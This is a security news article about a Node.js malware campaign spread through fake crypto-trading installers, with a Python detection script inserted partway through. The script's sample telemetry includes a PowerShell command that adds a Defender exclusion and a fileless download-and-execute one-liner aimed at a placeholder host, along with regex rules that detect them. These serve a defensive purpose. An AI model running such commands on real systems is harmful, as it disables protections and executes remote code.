
A Node.js malware campaign is actively targeting cryptocurrency users by using fake Binance and TradingView installers. Microsoft has reported that attackers leverage Node.js to deliver harmful payloads that can steal information and maintain access to infected systems.
How the Attack Unfolds
The attack starts with fake websites designed to look like legitimate cryptocurrency platforms. These sites trick users into downloading what appears to be real software. However, the downloaded installer contains a harmful dynamic-link library (DLL) called CustomActions.dll.
This DLL collects basic system data through Windows Management Instrumentation (WMI). At the same time, it creates a scheduled task to ensure the malware remains active even after a reboot. It opens the real Binance or TradingView website using msedge_proxy.exe to make the installer seem trustworthy.
Methods Used to Evade Detection
The malware runs PowerShell commands through the scheduled task. These commands:
- Download more malicious scripts from a remote server
- Set exclusions in Microsoft Defender to avoid being detected
- Use obfuscated code to gather more system details like BIOS info, installed apps, and hardware specifications
The stolen data is converted into JSON format and sent to a command-and-control (C2) server via HTTPS.
Role of Node.js
As part of the Node.js malware campaign, the PowerShell command downloads a Node.js runtime and a compiled JavaScript file. Node.js executes this file, which begins collecting browser-related data and establishes network connections.
In some cases, the attackers use a method called “ClickFix”. This strategy downloads Node.js and executes JavaScript directly in memory using PowerShell, without saving a file. The JavaScript then performs network scanning and disguises the C2 communication as traffic from Cloudflare. It also modifies registry keys to maintain access to the system.
Microsoft stated that Node.js is a widely trusted development tool. However, attackers are now exploiting its flexibility to run malicious code under the guise of legitimate applications.
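As an added example (not code from the article or from Microsoft's report), the following Python triages constructed process-creation records for the behaviours described in the two sections above: a scheduled-task-launched PowerShell adding a Defender exclusion, PowerShell spawning a Node.js runtime, fileless download-and-execute, and msedge_proxy.exe launched by an installer rather than by the browser. The rule names, file paths and the placeholder domain are assumptions; the rules are heuristics, not vendor signatures.

```python
import re
from dataclasses import dataclass
from ntpath import basename  # parses Windows paths on any host OS

@dataclass
class ProcEvent:
    """One process-creation record: parent image, child image, command line."""
    parent: str
    image: str
    cmdline: str

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample telemetry for this example; paths and the domain are placeholders.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\msiexec.exe",          # installer opens decoy site
              r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe",
              "msedge_proxy.exe --app=https://www.binance.com"),
    ProcEvent(r"C:\Windows\System32\svchost.exe", PS,      # task scheduler -> PowerShell
              'powershell.exe -NoProfile -w hidden -c "Add-MpPreference -ExclusionPath C:\\Users\\Public\\upd"'),
    ProcEvent(PS, r"C:\Users\Public\upd\node.exe",          # PowerShell -> Node.js runtime
              r"node.exe C:\Users\Public\upd\client.js"),
    ProcEvent(r"C:\Windows\explorer.exe", PS,               # in-memory download-and-run
              'powershell.exe -w hidden -c "iex (iwr https://placeholder.invalid/stage)"'),
    ProcEvent(r"C:\Windows\explorer.exe", PS, "powershell.exe -c Get-Date"),  # benign
]

def _ps(ev):
    return basename(ev.image).lower() == "powershell.exe"

# Each rule maps to one behaviour the article describes.
RULES = {
    "defender_exclusion_added": lambda ev: _ps(ev) and re.search(
        r"add-mppreference.*-exclusion(path|process|extension)", ev.cmdline, re.I),
    "task_service_spawned_powershell": lambda ev: _ps(ev)
        and basename(ev.parent).lower() == "svchost.exe",
    "powershell_spawned_node": lambda ev: basename(ev.parent).lower() == "powershell.exe"
        and basename(ev.image).lower() == "node.exe",
    "fileless_download_and_exec": lambda ev: _ps(ev)
        and re.search(r"\b(iex|invoke-expression)\b", ev.cmdline, re.I)
        and re.search(r"(downloadstring|\biwr\b|invoke-webrequest|invoke-restmethod)", ev.cmdline, re.I),
    "decoy_browser_from_installer": lambda ev: basename(ev.image).lower() == "msedge_proxy.exe"
        and basename(ev.parent).lower() not in {"msedge.exe", "explorer.exe"},
}

def triage(events):
    """Return (event_index, rule_name) for every rule that matches an event."""
    return [(i, name) for i, ev in enumerate(events)
            for name, rule in RULES.items() if rule(ev)]

if __name__ == "__main__":
    for idx, rule in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {rule} <- {SAMPLE_EVENTS[idx].cmdline}")
```

The benign last event fires no rule; in practice each hit should be correlated with the others (task creation followed by an exclusion and a Node.js launch) rather than alerted on alone.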
Related Campaigns and Threats
Another report from CloudSEK revealed a separate attack that used a fake PDF-to-DOCX converter website. This site closely resembled the real PDF Candy platform. It convinced users to run encoded PowerShell commands that installed the SectopRAT (also known as ArechClient2) information stealer.
Additionally, a hacking group known as Payroll Pirates has been running phishing campaigns that target employees with fake HR portals. These campaigns aim to steal login details and two-factor authentication codes. Once inside, the attackers change bank details to redirect salary payments to their own accounts.
Final Thoughts
The ongoing Node.js malware campaign highlights how trusted platforms can be exploited by attackers. Users, especially those in the cryptocurrency space, should be cautious when downloading software. Always verify the source before installing anything. Companies should also ensure that advanced threat protection tools are in place and up to date. This can significantly reduce the risk of falling victim to such sophisticated attacks.